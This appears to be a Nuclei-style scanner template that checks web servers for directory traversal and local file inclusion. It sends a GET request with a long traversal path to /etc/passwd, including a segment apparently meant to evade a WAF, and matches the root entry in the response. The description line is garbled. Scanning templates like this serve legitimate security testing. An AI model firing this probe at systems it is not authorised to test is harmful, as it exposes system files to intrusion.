id: param-lfi1-waf-tricky

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     actionectory traversal via the GET /.. substring.

  tags: param,lfi1,waf,tricky

requests:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../etc/random/../passwd"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

